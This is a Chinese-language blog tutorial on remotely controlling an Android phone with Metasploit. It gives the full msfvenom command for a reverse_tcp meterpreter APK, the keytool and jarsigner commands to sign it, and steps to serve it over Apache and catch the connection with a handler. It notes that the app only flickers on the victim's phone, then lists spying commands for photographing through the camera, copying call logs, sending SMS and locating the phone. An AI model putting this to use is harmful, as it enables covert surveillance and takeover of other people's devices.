kali技巧——远控Android手机(Metasploit)

我这里利用的是android/meterpreter/reverse_tcp 类型的payload 实现的复现

第一步:这个例子需要输入自己的ip和端口,首先打开kali,输入ifconfig查看一下我们的ip地址,在这里我的ip是192.168.1.110

第二步:生成payload(msfvenom命令中默认没有apk这种格式的文件。此处使用R来替代-f和-o) 然后我们就在kali命令栏直接输入

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.110 lport=4444 R>/root/shell.apk

lhost后面输的是自己的ip地址,lport后面输的是端口,随便一个端口就可以,R>后面是生成文件的位置和名称,我这里就在主目录下生成了名为shell.apk的文件

第三步:之后为软件添加签名, 创建签名需要使用Keytool、JARsigner、zipalign命令,首先是这个

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

这里首先自己设置一个密码,然后问一些姓氏什么的随便填,最后输入y或者yes就完成了,会生成一个文件

使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore shell.apk alias_name

最后在使用JARsigner验证签名

jarsigner -verify -verbose -certs shell.apk

到这里,签名就全部完成了,此apk就可以在Android使用

第四步:可以实现手机访问kali的ip直接下载apk文件,然后我们启动kali自带的apache服务(注:必须是同一个局域网,要是你有公网ip就当我没说)

service apache2 start

之后把我们的apk文件复制到apache服务的根目录下

如果这里报错说权限不够,可以在最前面加上sudo

ls显示一下这个根目录有什么,就能看到shell.apk已经在这里面了

到这手机就可以直接访问我们kali的ip地址加上shell.apk下载这个apk文件了,例:192.168.1.110 /shell.apk

第五步:开启主动端,等待连接

使用msfconsole开启Metasploit

使用监听模块exploit/multi/handler

设置自己kali的ip和之前输入的端口号,然后直接run就开始监听了,只要对方手机点击了这个软件(只是闪动一下,没有实际显示),就能够对他的手机进行一些命令

第六步:进行命令控制

webcam_snap 1实现使用摄像头拍照

在CAGqVm那个网页中实现摄像头的实时录像

复制最近的通话记录到主文件

用这个代码可以实现对指定手机发送指定短信

里面还有很多功能,如定位(由于是国外的,所以必须有谷歌地图才能实现)等,可以使用help命令来查看,感谢大家!!!

人已赞赏
各种教程

利用kali自带的sqlmap注入sqli-labs-master

2020-4-1 16:34:09

各种教程精品软件

两款网站后门在线查杀webshell工具

2020-6-10 10:12:51

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索